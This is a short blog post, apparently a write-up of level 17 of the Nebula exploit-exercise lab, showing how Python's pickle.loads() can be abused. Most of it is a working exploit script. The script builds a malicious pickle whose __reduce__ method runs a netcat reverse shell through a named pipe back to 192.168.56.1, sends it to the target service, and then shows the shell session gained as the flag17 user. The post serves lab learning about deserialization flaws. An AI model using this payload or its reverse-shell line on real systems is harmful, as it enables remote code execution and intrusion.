Thursday, October 4, 2012

Exploit Exercise - Python Pickles

Level [17] in nebula is pretty straight forward. The first look of it reveals the use of python's potentially vulnerable function pickle.loads(). The code simply unpickles any pickled data sent to it. We will use this vulnerability to perform command execution and gain a remote shell. Details about this can be found in paper Sour Pickles and blog.nelhage.com.
#!/usr/bin/env python
#payload.py
import pickle
import socket
import os
class payload(object):
    def __reduce__(self):
       comm = "rm /tmp/shell; mknod /tmp/shell p; nc 192.168.56.1 10008 0</tmp/shell | /bin/sh 1>/tmp/shell"
       return (os.system, (comm,))
payload = pickle.dumps( payload())
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
soc.connect(("192.168.56.2", 10007))
print soc.recv(1024)
soc.send(payload)
[root@renorobert 17]# python payload.py && nc -v -l 10008
Accepted connection from 192.168.56.1:56089
Connection from 192.168.56.2 port 10008 [tcp/octopus] accepted
id
uid=982(flag17) gid=982(flag17) groups=982(flag17)

No comments :

Post a Comment